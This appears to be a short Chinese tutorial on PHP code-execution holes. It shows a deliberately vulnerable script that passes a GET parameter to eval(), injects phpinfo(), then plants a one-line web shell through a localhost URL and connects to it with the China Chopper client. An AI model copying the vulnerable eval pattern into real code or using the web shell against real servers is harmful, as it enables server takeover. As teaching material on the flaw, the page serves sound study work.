php代码执行的两个函数eval(),assert()

<?php
	$i = $_GET['x'];
	eval($i);
?>

 eval()函数将以php类型执行传入的参数x的值

给x传入一个phpinfo();,执行

 php代码执行漏洞

给x传入一个php一句话代码,http://localhost/test/eval/eval.php?x=eval($_POST[a]);

用菜刀连接

php代码执行漏洞

连接成功

php代码执行漏洞

 

相关文章:

  • 2021-10-20
  • 2022-12-23
  • 2021-08-26
  • 2021-06-30
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-12-18
  • 2022-12-23
  • 2022-12-23
  • 2021-06-29
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案